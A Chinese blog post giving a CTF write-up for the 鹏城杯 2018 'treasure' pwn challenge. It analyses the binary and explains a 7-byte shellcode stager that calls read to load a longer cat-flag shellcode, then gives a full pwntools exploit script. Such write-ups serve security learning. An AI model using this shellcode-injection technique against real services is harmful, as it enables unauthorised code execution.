<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>鹏城杯_2018_treasure - Lynne&#039;s House</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="Lynne&#039;s House"><meta name="msapplication-TileImage" content="/img/favicon.png"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="Lynne&#039;s House"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="总结根据本题，学习与收获有：  算是很简单的shellcode的题，需要手写shellcode 在写shellcode之前，可以先观察下寄存器状态，比如这题就可以很巧妙的去运用read的系统调用 使用xchg交换两个寄存器的值，是一个很方便的指令"><meta property="og:type" content="blog"><meta property="og:title" content="鹏城杯_2018_treasure"><meta property="og:url" content="https://roderickchan.github.io/2021/08/15/%E9%B9%8F%E5%9F%8E%E6%9D%AF-2018-treasure/"><meta property="og:site_name" content="Lynne&#039;s House"><meta property="og:description" content="总结根据本题，学习与收获有：  算是很简单的shellcode的题，需要手写shellcode 在写shellcode之前，可以先观察下寄存器状态，比如这题就可以很巧妙的去运用read的系统调用 使用xchg交换两个寄存器的值，是一个很方便的指令"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815223050907.png"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815223131763.png"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815223351747.png"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815223721925.png"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815224254818.png"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815224339912.png"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815224452008.png"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815224555329.png"><meta property="article:published_time" content="2021-08-15T14:26:13.000Z"><meta property="article:modified_time" content="2021-08-15T14:45:59.809Z"><meta property="article:author" content="Roderick Chan"><meta property="article:tag" content="pwn"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815223050907.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://roderickchan.github.io/2021/08/15/%E9%B9%8F%E5%9F%8E%E6%9D%AF-2018-treasure/"},"headline":"鹏城杯_2018_treasure","image":["https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815223050907.png","https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815223131763.png","https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815223351747.png","https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815223721925.png","https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815224254818.png","https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815224339912.png","https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815224452008.png","https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815224555329.png"],"datePublished":"2021-08-15T14:26:13.000Z","dateModified":"2021-08-15T14:45:59.809Z","author":{"@type":"Person","name":"Roderick Chan"},"description":"总结根据本题，学习与收获有：  算是很简单的shellcode的题，需要手写shellcode 在写shellcode之前，可以先观察下寄存器状态，比如这题就可以很巧妙的去运用read的系统调用 使用xchg交换两个寄存器的值，是一个很方便的指令"}</script><link rel="canonical" href="https://roderickchan.github.io/2021/08/15/%E9%B9%8F%E5%9F%8E%E6%9D%AF-2018-treasure/"><link rel="icon" href="/img/favicon.png"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/5.12.0/css/all.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/highlight.js/9.12.0/styles/github.min.css"><link rel="stylesheet" href="https://fonts.loli.net/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><script>var _hmt = _hmt || [];
        (function() {
            var hm = document.createElement("script");
            hm.src = "//hm.baidu.com/hm.js?27073e91605117ab39e4af711d4afb4a";
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(hm, s);
        })();</script><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/cookieconsent/3.1.1/cookieconsent.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.8/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/css/justifiedGallery.min.css"><!--!--><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/pace/1.0.2/pace.min.js"></script><!--!--><!--!--><meta name="generator" content="Hexo 5.4.0"></head><body class="is-2-column"><nav class="navbar navbar-main"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/logo.png" alt="Lynne&#039;s House" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">首页</a><a class="navbar-item" href="/archives">归档</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/tags">标签</a><a class="navbar-item" href="/about">关于我</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/RoderickChan"><i class="fab fa-github"></i></a><a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-8-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item copyright article-title type-2">原创</span><span class="level-item"><time dateTime="2021-08-15T14:26:13.000Z" title="8/15/2021, 10:26:13 PM">2021-08-15</time>发表</span><span class="level-item"><time dateTime="2021-08-15T14:45:59.809Z" title="8/15/2021, 10:45:59 PM">2021-08-15</time>更新</span><span class="level-item"><a class="link-muted" href="/categories/CTF/">CTF</a><span> / </span><a class="link-muted" href="/categories/CTF/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/">pwn做题记录</a></span><span class="level-item">4 分钟读完 (大约587个字)</span><span class="level-item" id="busuanzi_container_page_pv"><span id="busuanzi_value_page_pv">0</span>次访问</span></div></div><h1 class="title is-3 is-size-4-mobile"> 鹏城杯_2018_treasure</h1><div class="copyright article-block type-2"><p>版权申明：本文为原创文章，转载请注明原文出处</p><p>原文链接：<a href="https://roderickchan.github.io/2021/08/15/%E9%B9%8F%E5%9F%8E%E6%9D%AF-2018-treasure/" target="_blank">https://roderickchan.github.io/2021/08/15/%E9%B9%8F%E5%9F%8E%E6%9D%AF-2018-treasure/</a></p></div><div class="content"><h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>根据本题，学习与收获有：</p>
<ul>
<li>算是很简单的<code>shellcode</code>的题，需要手写<code>shellcode</code></li>
<li>在写<code>shellcode</code>之前，可以先观察下寄存器状态，比如这题就可以很巧妙的去运用<code>read</code>的系统调用</li>
<li>使用<code>xchg</code>交换两个寄存器的值，是一个很方便的指令</li>
</ul>
<span id="more"></span>
<h3 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h3><h4 id="checksec"><a href="#checksec" class="headerlink" title="checksec"></a>checksec</h4><p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815223050907.png" alt="image-20210815223050907"></p>
<p>题目使用的环境为<code>ubuntu-18.04</code></p>
<h4 id="函数分析"><a href="#函数分析" class="headerlink" title="函数分析"></a>函数分析</h4><h5 id="settreasure"><a href="#settreasure" class="headerlink" title="settreasure"></a>settreasure</h5><p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815223131763.png" alt="image-20210815223131763"></p>
<p>流程为：</p>
<ul>
<li>申请两个大小为<code>0x1000</code>的匿名映射段</li>
<li>往<code>sea</code>上拷贝了一段<code>shellcode</code>，但是拷贝的位置不可知，是随机的</li>
<li>把<code>data</code>段上的<code>shellcode</code>给清零了</li>
</ul>
<h5 id="treasure"><a href="#treasure" class="headerlink" title="treasure"></a>treasure</h5><p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815223351747.png" alt="image-20210815223351747"></p>
<p>主要流程为：</p>
<ul>
<li><p>将<code>code</code>段的权限改为<code>rwx</code>。这里虽然传入的是<code>0xa</code>，但是<code>mprotect</code>的改变权限的内存大小按照页对齐。</p>
</li>
<li><p>允许写入<code>9</code>个字节的<code>shellcode</code></p>
</li>
<li>然后执行<code>shellcode</code></li>
</ul>
<h3 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h3><p>这里要写<code>shellcode</code>，但是只能写<code>9</code>个字节，所以写之前先打个断点看下寄存器的状态：</p>
<p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815223721925.png" alt="image-20210815223721925"></p>
<p>观察一下：</p>
<ul>
<li><p><code>rax</code>为<code>0</code></p>
</li>
<li><p><code>rdi</code>为<code>0</code></p>
</li>
<li><code>rdx</code>为<code>code+1</code>处</li>
<li><code>rsi</code>为<code>0x400c2a</code></li>
</ul>
<p>这个时候，交换一下<code>rsi</code>和<code>rdx</code>的值，然后再<code>syscall</code>，就是直接调用<code>read</code>，这个时候再写入比较长的<code>shellcode</code>然后再<code>call rsi</code>即可。那么只需要三条指令：<code>xchg rdi, rdx; syscall; call rsi</code>，肯定不会超过<code>9</code>字节啦。实测发现只有<code>7</code>个字节。</p>
<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><h4 id="调试过程"><a href="#调试过程" class="headerlink" title="调试过程"></a>调试过程</h4><p>这里我选择填入<code>cat /flag</code>的<code>shellcode</code>。需要注意的是，需要跳过前<code>5</code>个字节，调试过程如下：</p>
<p>触发<code>read</code>：</p>
<p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815224254818.png" alt="image-20210815224254818"></p>
<p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815224339912.png" alt="image-20210815224339912"></p>
<p>写入<code>shellcode</code>读取<code>flag</code>：</p>
<p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815224452008.png" alt="image-20210815224452008"></p>
<h4 id="完整exp"><a href="#完整exp" class="headerlink" title="完整exp"></a>完整exp</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwncli <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">cli_script()</span><br><span class="line"></span><br><span class="line">p:tube = gift[<span class="string">&#x27;io&#x27;</span>]</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">&quot;will you continue?(enter &#x27;n&#x27; to quit) :&quot;</span>, <span class="string">&quot;y&quot;</span>)</span><br><span class="line"></span><br><span class="line">payload = asm(<span class="string">&quot;xchg rdx, rsi;syscall;call rsi&quot;</span>)</span><br><span class="line"></span><br><span class="line">p.sendafter(<span class="string">&quot;start!!!!&quot;</span>, payload)</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">b&quot;a&quot;</span>*<span class="number">5</span> + asm(shellcraft.cat(<span class="string">&quot;./flag&quot;</span>)))</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p>最后远程打：</p>
<p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210815224555329.png" alt="image-20210815224555329"></p>
<h3 id="引用与参考"><a href="#引用与参考" class="headerlink" title="引用与参考"></a>引用与参考</h3><p>1、<a href="https://roderickchan.github.io">My Blog</a></p>
<p>2、<a target="_blank" rel="noopener" href="https://ctf-wiki.org/">Ctf Wiki</a></p>
<p>3、<a target="_blank" rel="noopener" href="https://github.com/RoderickChan/pwncli">pwncli</a></p>
</div><div class="article-licensing box"><div class="licensing-title"><p>鹏城杯_2018_treasure</p><p><a href="https://roderickchan.github.io/2021/08/15/鹏城杯-2018-treasure/">https://roderickchan.github.io/2021/08/15/鹏城杯-2018-treasure/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>Roderick Chan</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2021-08-15</p></div></div><div class="level-item is-narrow"><div><h6>更新于</h6><p>2021-08-15</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icon" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a><a class="icon" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a><a class="icon" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="article-tags is-size-7 mb-4"><span class="mr-2">#</span><a class="link-muted mr-2" rel="tag" href="/tags/pwn/">pwn</a></div><div class="sharethis-inline-share-buttons"></div><script src="https://platform-api.sharethis.com/js/sharethis.js#property=606007929c00ae0011d418d7&amp;product=inline-share-buttons" defer></script></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">喜欢这篇文章？打赏一下作者吧</h3><div class="buttons is-centered"><a class="button donate" data-type="alipay"><span class="icon is-small"><i class="fab fa-alipay"></i></span><span>支付宝</span><span class="qrcode"><img src="/img/alipay.jpg" alt="支付宝"></span></a><a class="button donate" data-type="wechat"><span class="icon is-small"><i class="fab fa-weixin"></i></span><span>微信</span><span class="qrcode"><img src="/img/wechat.png" alt="微信"></span></a></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2021/08/18/RedPacket-SoEasyPwn/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">RedPacket_SoEasyPwn</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2021/08/14/GKCTF-2021-checkin/"><span class="level-item">GKCTF-2021-checkin</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card"><div class="card-content"><h3 class="title is-5">评论</h3><div class="content" id="valine-thread"></div><script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="https://cdnjs.loli.net/ajax/libs/valine/1.4.14/Valine.min.js"></script><script>new Valine({
            el: '#valine-thread' ,
            appId: "Cm6SOyxcRow2ynGlFReSz3y4-gzGzoHsz",
            appKey: "oL6sTozQUPUAAe5Yl5JR4h9w",
            placeholder: "leave your comments",
            avatar: "mp",
            
            meta: ["nick","mail"],
            pageSize: 10,
            lang: "en",
            visitor: true,
            highlight: true,
            
            
            
            
            
            requiredFields: [],
        });</script></div></div></div><!--!--><div class="column column-right is-4-tablet is-4-desktop is-4-widescreen  order-3 is-sticky"><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">目录</h3><ul class="menu-list"><li><a class="level is-mobile" href="#总结"><span class="level-left"><span class="level-item">1</span><span class="level-item">总结</span></span></a></li><li><a class="level is-mobile" href="#题目分析"><span class="level-left"><span class="level-item">2</span><span class="level-item">题目分析</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#checksec"><span class="level-left"><span class="level-item">2.1</span><span class="level-item">checksec</span></span></a></li><li><a class="level is-mobile" href="#函数分析"><span class="level-left"><span class="level-item">2.2</span><span class="level-item">函数分析</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#settreasure"><span class="level-left"><span class="level-item">2.2.1</span><span class="level-item">settreasure</span></span></a></li><li><a class="level is-mobile" href="#treasure"><span class="level-left"><span class="level-item">2.2.2</span><span class="level-item">treasure</span></span></a></li></ul></li></ul></li><li><a class="level is-mobile" href="#利用思路"><span class="level-left"><span class="level-item">3</span><span class="level-item">利用思路</span></span></a></li><li><a class="level is-mobile" href="#exp"><span class="level-left"><span class="level-item">4</span><span class="level-item">exp</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#调试过程"><span class="level-left"><span class="level-item">4.1</span><span class="level-item">调试过程</span></span></a></li><li><a class="level is-mobile" href="#完整exp"><span class="level-left"><span class="level-item">4.2</span><span class="level-item">完整exp</span></span></a></li></ul></li><li><a class="level is-mobile" href="#引用与参考"><span class="level-left"><span class="level-item">5</span><span class="level-item">引用与参考</span></span></a></li></ul></div></div><style>#toc .menu-list > li > a.is-active + .menu-list { display: block; }#toc .menu-list > li > a + .menu-list { display: none; }</style><script src="/js/toc.js" defer></script></div><div class="card widget" data-type="recent-posts"><div class="card-content"><h3 class="menu-label">最新文章</h3><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-03-05T15:34:59.000Z">2022-03-05</time></p><p class="title"><a href="/2022/03/05/ciscn-2019-en-1/">ciscn_2019_en_1</a></p><p class="categories"><a href="/categories/CTF/">CTF</a> / <a href="/categories/CTF/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/">pwn做题记录</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-03-05T15:31:48.000Z">2022-03-05</time></p><p class="title"><a href="/2022/03/05/root-me-stack-buffer-overflow-basic/">root_me_stack_buffer_overflow_basic</a></p><p class="categories"><a href="/categories/CTF/">CTF</a> / <a href="/categories/CTF/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/">pwn做题记录</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-03-05T15:14:54.000Z">2022-03-05</time></p><p class="title"><a href="/2022/03/05/ycb-2020-easy-heap/">ycb_2020_easy_heap</a></p><p class="categories"><a href="/categories/CTF/">CTF</a> / <a href="/categories/CTF/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/">pwn做题记录</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-03-04T12:31:09.000Z">2022-03-04</time></p><p class="title"><a href="/2022/03/04/pwnable-applestore/">pwnable_applestore</a></p><p class="categories"><a href="/categories/CTF/">CTF</a> / <a href="/categories/CTF/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/">pwn做题记录</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-03-04T12:30:46.000Z">2022-03-04</time></p><p class="title"><a href="/2022/03/04/ciscn-2019-final-6/">ciscn_2019_final_6</a></p><p class="categories"><a href="/categories/CTF/">CTF</a> / <a href="/categories/CTF/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/">pwn做题记录</a></p></div></article></div></div><div class="card widget" data-type="categories"><div class="card-content"><div class="menu"><h3 class="menu-label">分类</h3><ul class="menu-list"><li><a class="level is-mobile" href="/categories/CTF/"><span class="level-start"><span class="level-item">CTF</span></span><span class="level-end"><span class="level-item tag">74</span></span></a><ul><li><a class="level is-mobile" href="/categories/CTF/Contest-Wp/"><span class="level-start"><span class="level-item">Contest Wp</span></span><span class="level-end"><span class="level-item tag">4</span></span></a></li><li><a class="level is-mobile" href="/categories/CTF/crypto%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/"><span class="level-start"><span class="level-item">crypto做题记录</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/categories/CTF/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/"><span class="level-start"><span class="level-item">pwn做题记录</span></span><span class="level-end"><span class="level-item tag">69</span></span></a></li></ul></li><li><a class="level is-mobile" href="/categories/%E5%B7%A5%E5%85%B7%E4%B8%8E%E8%84%9A%E6%9C%AC/"><span class="level-start"><span class="level-item">工具与脚本</span></span><span class="level-end"><span class="level-item tag">3</span></span></a><ul><li><a class="level is-mobile" href="/categories/%E5%B7%A5%E5%85%B7%E4%B8%8E%E8%84%9A%E6%9C%AC/python/"><span class="level-start"><span class="level-item">python</span></span><span class="level-end"><span class="level-item tag">3</span></span></a></li></ul></li><li><a class="level is-mobile" href="/categories/%E6%95%99%E7%A8%8B/"><span class="level-start"><span class="level-item">教程</span></span><span class="level-end"><span class="level-item tag">1</span></span></a><ul><li><a class="level is-mobile" href="/categories/%E6%95%99%E7%A8%8B/frp/"><span class="level-start"><span class="level-item">frp</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li></ul></li></ul></div></div></div><div class="card widget" data-type="tags"><div class="card-content"><div class="menu"><h3 class="menu-label">标签</h3><div class="field is-grouped is-grouped-multiline"><div class="control"><a class="tags has-addons" href="/tags/FSOP/"><span class="tag">FSOP</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/IO-FILE/"><span class="tag">IO_FILE</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/alarm/"><span class="tag">alarm</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/arm/"><span class="tag">arm</span><span class="tag">4</span></a></div><div class="control"><a class="tags has-addons" href="/tags/canary/"><span class="tag">canary</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/ciscn-2019/"><span class="tag">ciscn 2019</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/crypto/"><span class="tag">crypto</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/fastbin-attack/"><span class="tag">fastbin attack</span><span class="tag">8</span></a></div><div class="control"><a class="tags has-addons" href="/tags/fini-array/"><span class="tag">fini.array</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/got-plt/"><span class="tag">got.plt</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/house-of-force/"><span class="tag">house of force</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/house-of-orange/"><span class="tag">house of orange</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/jmp-short/"><span class="tag">jmp short</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/largebin-attack/"><span class="tag">largebin attack</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/main-arena/"><span class="tag">main_arena</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/malloc-hook/"><span class="tag">malloc_hook</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/non-stack-printf/"><span class="tag">non-stack printf</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/off-by-null/"><span class="tag">off by null</span><span class="tag">7</span></a></div><div class="control"><a class="tags has-addons" href="/tags/one-gadget/"><span class="tag">one_gadget</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/print/"><span class="tag">print</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/printf/"><span class="tag">printf</span><span class="tag">8</span></a></div><div class="control"><a class="tags has-addons" href="/tags/printf-attack/"><span class="tag">printf attack</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/pwn/"><span class="tag">pwn</span><span class="tag">74</span></a></div><div class="control"><a class="tags has-addons" href="/tags/python/"><span class="tag">python</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/realloc/"><span class="tag">realloc</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/realloc-hook/"><span class="tag">realloc_hook</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/rop/"><span class="tag">rop</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/rsa/"><span class="tag">rsa</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/rtld-global/"><span class="tag">rtld_global</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/scanf/"><span class="tag">scanf</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/shellcode/"><span class="tag">shellcode</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/srop/"><span class="tag">srop</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/stack-pivot/"><span class="tag">stack pivot</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/stack-smash/"><span class="tag">stack smash</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/stdout/"><span class="tag">stdout</span><span class="tag">7</span></a></div><div class="control"><a class="tags has-addons" href="/tags/syscall/"><span class="tag">syscall</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/tcache-bin-attack/"><span class="tag">tcache bin attack</span><span class="tag">5</span></a></div><div class="control"><a class="tags has-addons" href="/tags/tcache-dup/"><span class="tag">tcache dup</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/tcache-perthread-corruption/"><span class="tag">tcache perthread corruption</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/tcache-poisoning/"><span class="tag">tcache poisoning</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/tcache-stash-unlink/"><span class="tag">tcache stash unlink</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/template/"><span class="tag">template</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/top-chunk/"><span class="tag">top chunk</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/uaf/"><span class="tag">uaf</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/unlink/"><span class="tag">unlink</span><span class="tag">7</span></a></div><div class="control"><a class="tags has-addons" href="/tags/unsorted-bin-attack/"><span class="tag">unsorted bin attack</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/vm/"><span class="tag">vm</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/windows-terminal/"><span class="tag">windows terminal</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E4%BE%A7%E4%BF%A1%E9%81%93/"><span class="tag">侧信道</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%95%99%E7%A8%8B/"><span class="tag">教程</span><span class="tag">1</span></a></div></div></div></div></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/logo.png" alt="Lynne&#039;s House" height="28"></a><p class="is-size-7"><span>&copy; 2022 Roderick Chan</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a><br><span id="busuanzi_container_site_uv">共<span id="busuanzi_value_site_uv">0</span>个访客, <span id="busuanzi_value_site_pv">0</span>次访问</span></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="GitHub" href="https://github.com/RoderickChan"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdnjs.loli.net/ajax/libs/jquery/3.3.1/jquery.min.js"></script><script src="https://cdnjs.loli.net/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script><script src="https://cdnjs.loli.net/ajax/libs/clipboard.js/2.0.4/clipboard.min.js" defer></script><script>moment.locale("zh-CN");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/cookieconsent/3.1.1/cookieconsent.min.js" defer></script><script>window.addEventListener("load", () => {
      window.cookieconsent.initialise({
        type: "info",
        theme: "edgeless",
        static: false,
        position: "bottom-left",
        content: {
          message: "此网站使用Cookie来改善您的体验。",
          dismiss: "知道了！",
          allow: "允许使用Cookie",
          deny: "拒绝",
          link: "了解更多",
          policy: "Cookie政策",
          href: "https://www.cookiesandyou.com/",
        },
        palette: {
          popup: {
            background: "#edeff5",
            text: "#838391"
          },
          button: {
            background: "#4b81e8"
          },
        },
      });
